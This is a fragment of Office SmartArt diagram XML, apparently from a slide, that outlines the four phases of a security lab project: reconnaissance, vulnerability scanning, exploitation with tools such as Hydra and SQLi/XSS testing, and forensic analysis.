    <dgm:pt modelId="{8ECAB204-E263-4CC7-9639-EFF68C2AADFE}" type="pres">
      <dgm:prSet presAssocID="{19B0EE6D-DB29-4A98-85AE-F2906B5BEC57}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{116BA17F-11D3-47E0-8F6C-95AFF82623C8}" type="pres">
      <dgm:prSet presAssocID="{19B0EE6D-DB29-4A98-85AE-F2906B5BEC57}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{358C040F-0CCC-4FE7-ACE9-79CA37F8CCA8}" type="presOf" srcId="{DCF0B428-9472-4890-AC47-ABFECED07786}" destId="{8ED007BB-26B2-4756-A25F-2EDFCCAC8874}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BA522626-6BDC-4C0E-ADB1-7144A89A8E1F}" type="presOf" srcId="{19B0EE6D-DB29-4A98-85AE-F2906B5BEC57}" destId="{89521AC9-AB8B-4C77-8EBD-6D5C05163370}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B673A12C-3492-4A0B-8FBD-F6820329D265}" srcId="{D676B0A0-D758-4873-ADF0-E71A976C1642}" destId="{DCF0B428-9472-4890-AC47-ABFECED07786}" srcOrd="0" destOrd="0" parTransId="{244176BE-8498-4423-91F2-76E2EEE9CBE0}" sibTransId="{1F1EA35D-4030-43F7-AE45-D5B4E4BED244}"/>
    <dgm:cxn modelId="{386DC12F-F8DE-4E67-8BFD-E1460C3A168D}" srcId="{954E399D-84A8-4CE2-9796-3D500AB783DD}" destId="{5DF8B959-2381-49C0-AA3C-E6891EF2A97B}" srcOrd="0" destOrd="0" parTransId="{ABCC4EFE-F16D-4D88-B59D-FE211A34B2CE}" sibTransId="{232E41C7-C670-474D-934D-AA81CF9023BD}"/>
    <dgm:cxn modelId="{2E9E5F34-A2F4-41C0-A5B3-BE3B5C6DF558}" srcId="{9DD4672A-5E7A-4719-8813-90ACE2C6DF34}" destId="{19B0EE6D-DB29-4A98-85AE-F2906B5BEC57}" srcOrd="2" destOrd="0" parTransId="{45BED77B-3CC2-4175-9C57-387153449AE9}" sibTransId="{1271E211-1981-489D-A74A-426D3804FCDB}"/>
    <dgm:cxn modelId="{73815737-7091-48E7-AFB4-EB67F8737FB9}" srcId="{9DD4672A-5E7A-4719-8813-90ACE2C6DF34}" destId="{D676B0A0-D758-4873-ADF0-E71A976C1642}" srcOrd="0" destOrd="0" parTransId="{81F114EC-489B-49D3-A41F-4A764DD92637}" sibTransId="{66010279-CF4E-4D38-BD24-B979BA5F56D6}"/>
    <dgm:cxn modelId="{B7328764-3076-4F61-8A2D-B1ABC2A7FC3D}" srcId="{19B0EE6D-DB29-4A98-85AE-F2906B5BEC57}" destId="{A31252F9-6FDA-44BC-AEC4-8CC832D38A3F}" srcOrd="0" destOrd="0" parTransId="{00352698-3844-4E7C-8CC0-847BFEDBAD07}" sibTransId="{BD079792-A770-4E77-9AE7-2418D7C2EEFF}"/>
    <dgm:cxn modelId="{53810565-4415-4BB3-AB41-AB8B835059AC}" type="presOf" srcId="{19B0EE6D-DB29-4A98-85AE-F2906B5BEC57}" destId="{D5DB5218-2F0A-4720-827A-713EB3AA6B7F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{06445646-62F5-49B4-9D2D-FBE7163FC77D}" type="presOf" srcId="{954E399D-84A8-4CE2-9796-3D500AB783DD}" destId="{AB019AFD-C1AA-498A-B591-2D67EC48F4F0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{571B2F6E-C1C7-4EC4-9EB8-317383A064E3}" type="presOf" srcId="{5DF8B959-2381-49C0-AA3C-E6891EF2A97B}" destId="{17C7100A-9599-4A70-BDE4-C9B396C98BFD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{80CFD281-76BC-40E1-89B3-15DB7E7372A8}" type="presOf" srcId="{9DD4672A-5E7A-4719-8813-90ACE2C6DF34}" destId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{14B905A6-FF56-410E-A1D9-C5D8C184BC01}" type="presOf" srcId="{D676B0A0-D758-4873-ADF0-E71A976C1642}" destId="{B4220182-EC1A-41F1-A3DA-2D1D3350C1D6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{EE3909A7-D77B-479F-992A-7EB7CC556081}" srcId="{9DD4672A-5E7A-4719-8813-90ACE2C6DF34}" destId="{954E399D-84A8-4CE2-9796-3D500AB783DD}" srcOrd="1" destOrd="0" parTransId="{02AA8D64-43DF-47D8-ADCC-04F9A78C8C1A}" sibTransId="{C7F8EA5E-46E2-420D-BAC8-D0794816C5E1}"/>
    <dgm:cxn modelId="{4F9664A9-903F-4C80-B5B1-854530EC5D6A}" type="presOf" srcId="{A31252F9-6FDA-44BC-AEC4-8CC832D38A3F}" destId="{116BA17F-11D3-47E0-8F6C-95AFF82623C8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8B6154B3-CD6C-44C2-96F5-B2C09B760229}" type="presOf" srcId="{954E399D-84A8-4CE2-9796-3D500AB783DD}" destId="{C2F41F69-52F3-44CF-9765-EBA94C2C4A06}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{50F177E4-9687-4DA4-BD36-9A494871F47E}" type="presOf" srcId="{D676B0A0-D758-4873-ADF0-E71A976C1642}" destId="{BE440131-C756-4688-88AC-E1DB352D6A2E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{D51AA1CD-293D-4BC4-954F-DE356E203BE6}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{B4FBB1DB-EB5F-4EA7-BA9A-FF90CA7DE4BF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{2B7B1A83-2157-43CA-B85B-0624D0E84B96}" type="presParOf" srcId="{B4FBB1DB-EB5F-4EA7-BA9A-FF90CA7DE4BF}" destId="{B4220182-EC1A-41F1-A3DA-2D1D3350C1D6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8E73EF28-BDF0-4B1C-9AFB-EF607FBD6B94}" type="presParOf" srcId="{B4FBB1DB-EB5F-4EA7-BA9A-FF90CA7DE4BF}" destId="{BE440131-C756-4688-88AC-E1DB352D6A2E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{FFB20EE5-A1D4-46CF-9A0A-ABE80AC3554A}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{77D38FB5-D088-4678-AE79-C66B976CEF1D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{051FCDAB-2F87-49C9-83E1-3A3963B99D1D}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{8ED007BB-26B2-4756-A25F-2EDFCCAC8874}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B4016189-0180-40C5-90C2-B222FCF5AA68}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{54E13D37-1877-49AF-98E3-20736323B693}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E7A7204B-65D7-4722-BE41-E756075C6D10}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{4C4A8155-D1B3-43AE-AD26-2002F0BAB7FA}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{81ED8CF4-4B4A-43BA-A2E4-4782DC3ABACE}" type="presParOf" srcId="{4C4A8155-D1B3-43AE-AD26-2002F0BAB7FA}" destId="{C2F41F69-52F3-44CF-9765-EBA94C2C4A06}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CD49FD79-B352-4ABA-8D0A-B0CAC1C2F501}" type="presParOf" srcId="{4C4A8155-D1B3-43AE-AD26-2002F0BAB7FA}" destId="{AB019AFD-C1AA-498A-B591-2D67EC48F4F0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A21B35EB-391E-4441-8FFF-0887234576D9}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{9BD9F594-B3E0-44F7-985B-A2A444D1E633}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DEFEBEDA-7814-4894-A1F4-6C625A163650}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{17C7100A-9599-4A70-BDE4-C9B396C98BFD}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B86292E4-7D82-4B67-86FD-5C8325B62053}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{651D70B9-DA08-4F35-A0D8-B15E818BB65B}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{231B3555-C1E9-4EF9-BD3D-0570A29E686E}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{E2DE9BCA-EA79-4A94-AFF5-65F329AD005E}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F2C14B31-0853-4F6F-A4EE-05346F6EA585}" type="presParOf" srcId="{E2DE9BCA-EA79-4A94-AFF5-65F329AD005E}" destId="{89521AC9-AB8B-4C77-8EBD-6D5C05163370}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{16A821EC-438D-4ACC-A2A5-DEEE2A81B98B}" type="presParOf" srcId="{E2DE9BCA-EA79-4A94-AFF5-65F329AD005E}" destId="{D5DB5218-2F0A-4720-827A-713EB3AA6B7F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{D2A04BCA-2FB9-48D1-BD49-ABD3B314C56B}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{8ECAB204-E263-4CC7-9639-EFF68C2AADFE}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BA288527-A975-4888-B73B-60E7C81D065E}" type="presParOf" srcId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" destId="{116BA17F-11D3-47E0-8F6C-95AFF82623C8}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/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DD4672A-5E7A-4719-8813-90ACE2C6DF34}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/list1" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful3" csCatId="colorful" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D676B0A0-D758-4873-ADF0-E71A976C1642}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Phase 1 : Reconnaissance</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{81F114EC-489B-49D3-A41F-4A764DD92637}" type="parTrans" cxnId="{73815737-7091-48E7-AFB4-EB67F8737FB9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{66010279-CF4E-4D38-BD24-B979BA5F56D6}" type="sibTrans" cxnId="{73815737-7091-48E7-AFB4-EB67F8737FB9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DCF0B428-9472-4890-AC47-ABFECED07786}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="0" i="0"/>
            <a:t>Information gathering </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>(Netdiscover, Nmap)</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{244176BE-8498-4423-91F2-76E2EEE9CBE0}" type="parTrans" cxnId="{B673A12C-3492-4A0B-8FBD-F6820329D265}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1F1EA35D-4030-43F7-AE45-D5B4E4BED244}" type="sibTrans" cxnId="{B673A12C-3492-4A0B-8FBD-F6820329D265}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{954E399D-84A8-4CE2-9796-3D500AB783DD}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Phase 2 : Target Assessment</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02AA8D64-43DF-47D8-ADCC-04F9A78C8C1A}" type="parTrans" cxnId="{EE3909A7-D77B-479F-992A-7EB7CC556081}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7F8EA5E-46E2-420D-BAC8-D0794816C5E1}" type="sibTrans" cxnId="{EE3909A7-D77B-479F-992A-7EB7CC556081}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5DF8B959-2381-49C0-AA3C-E6891EF2A97B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t> Vulnerability scanning &amp; enumeration (OpenVAS, SMB, DVWA)</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ABCC4EFE-F16D-4D88-B59D-FE211A34B2CE}" type="parTrans" cxnId="{386DC12F-F8DE-4E67-8BFD-E1460C3A168D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{232E41C7-C670-474D-934D-AA81CF9023BD}" type="sibTrans" cxnId="{386DC12F-F8DE-4E67-8BFD-E1460C3A168D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{19B0EE6D-DB29-4A98-85AE-F2906B5BEC57}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Phase 3 : Execution of Vulnerabilities</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t> </a:t>
          </a:r>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{45BED77B-3CC2-4175-9C57-387153449AE9}" type="parTrans" cxnId="{2E9E5F34-A2F4-41C0-A5B3-BE3B5C6DF558}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1271E211-1981-489D-A74A-426D3804FCDB}" type="sibTrans" cxnId="{2E9E5F34-A2F4-41C0-A5B3-BE3B5C6DF558}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A31252F9-6FDA-44BC-AEC4-8CC832D38A3F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t> Exploitation &amp; validation (SQLi, XSS, Hydra, Autopsy)</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00352698-3844-4E7C-8CC0-847BFEDBAD07}" type="parTrans" cxnId="{B7328764-3076-4F61-8A2D-B1ABC2A7FC3D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD079792-A770-4E77-9AE7-2418D7C2EEFF}" type="sibTrans" cxnId="{B7328764-3076-4F61-8A2D-B1ABC2A7FC3D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{766E94A5-8C0D-42BE-B8B0-1DEAE116848A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Phase 4 : </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1" i="0"/>
            <a:t>Forensic Analysis </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t> </a:t>
          </a:r>
          <a:endParaRPr lang="en-DE" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{81687973-D006-423A-9D67-A0455993C4A9}" type="parTrans" cxnId="{DE3E3B12-BA5F-4AFC-B10E-D093CA3E7E86}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{31038C07-5394-41FD-ABF5-A10C9D13383C}" type="sibTrans" cxnId="{DE3E3B12-BA5F-4AFC-B10E-D093CA3E7E86}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E3A2D6DC-FED0-4C56-8179-85FABEA98002}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" b="0" i="0"/>
            <a:t>Hash verification, hidden file recovery, and evidence documentation (MD5, Autopsy, Steganography)</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{17179ACE-13E7-47EE-ABAE-8E5DE3035471}" type="parTrans" cxnId="{54073D49-0BE6-42E6-9F41-4D2F421E9349}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B1AE961-66B1-4618-B89F-C3CB36944289}" type="sibTrans" cxnId="{54073D49-0BE6-42E6-9F41-4D2F421E9349}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1B3344C1-8049-4F48-9F7D-C3D949BF4158}" type="pres">
      <dgm:prSet presAssocID="{9DD4672A-5E7A-4719-8813-90ACE2C6DF34}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B4FBB1DB-EB5F-4EA7-BA9A-FF90CA7DE4BF}" type="pres">
      <dgm:prSet presAssocID="{D676B0A0-D758-4873-ADF0-E71A976C1642}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B4220182-EC1A-41F1-A3DA-2D1D3350C1D6}" type="pres">
      <dgm:prSet presAssocID="{D676B0A0-D758-4873-ADF0-E71A976C1642}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BE440131-C756-4688-88AC-E1DB352D6A2E}" type="pres">
      <dgm:prSet presAssocID="{D676B0A0-D758-4873-ADF0-E71A976C1642}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{77D38FB5-D088-4678-AE79-C66B976CEF1D}" type="pres">
      <dgm:prSet presAssocID="{D676B0A0-D758-4873-ADF0-E71A976C1642}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8ED007BB-26B2-4756-A25F-2EDFCCAC8874}" type="pres">
      <dgm:prSet presAssocID="{D676B0A0-D758-4873-ADF0-E71A976C1642}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{54E13D37-1877-49AF-98E3-20736323B693}" type="pres">
      <dgm:prSet presAssocID="{66010279-CF4E-4D38-BD24-B979BA5F56D6}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4C4A8155-D1B3-43AE-AD26-2002F0BAB7FA}" type="pres">
      <dgm:prSet presAssocID="{954E399D-84A8-4CE2-9796-3D500AB783DD}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2F41F69-52F3-44CF-9765-EBA94C2C4A06}" type="pres">
      <dgm:prSet presAssocID="{954E399D-84A8-4CE2-9796-3D500AB783DD}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AB019AFD-C1AA-498A-B591-2D67EC48F4F0}" type="pres">
      <dgm:prSet presAssocID="{954E399D-84A8-4CE2-9796-3D500AB783DD}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9BD9F594-B3E0-44F7-985B-A2A444D1E633}" type="pres">
      <dgm:prSet presAssocID="{954E399D-84A8-4CE2-9796-3D500AB783DD}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{17C7100A-9599-4A70-BDE4-C9B396C98BFD}" type="pres">
      <dgm:prSet presAssocID="{954E399D-84A8-4CE2-9796-3D500AB783DD}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{651D70B9-DA08-4F35-A0D8-B15E818BB65B}" type="pres">
      <dgm:prSet presAssocID="{C7F8EA5E-46E2-420D-BAC8-D0794816C5E1}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E2DE9BCA-EA79-4A94-AFF5-65F329AD005E}" type="pres">
      <dgm:prSet presAssocID="{19B0EE6D-DB29-4A98-85AE-F2906B5BEC57}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{89521AC9-AB8B-4C77-8EBD-6D5C05163370}" type="pres">
      <dgm:prSet presAssocID="{19B0EE6D-DB29-4A98-85AE-F2906B5BEC57}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D5DB5218-2F0A-4720-827A-713EB3AA6B7F}" type="pres">
      <dgm:prSet presAssocID="{19B0EE6D-DB29-4A98-85AE-F2906B5BEC57}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8ECAB204-E263-4CC7-9639-EFF68C2AADFE}" type="pres">
      <dgm:prSet presAssocID="{19B0EE6D-DB29-4A98-85AE-F2906B5BEC57}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{116BA17F-11D3-47E0-8F6C-95AFF82623C8}" type="pres">
      <dgm:prSet presAssocID="{19B0EE6D-DB29-4A98-85AE-F2906B5BEC57}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{870967FF-3FC3-4FFF-B79A-0D02A0E68A39}" type="pres">
      <dgm:prSet presAssocID="{1271E211-1981-489D-A74A-426D3804FCDB}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
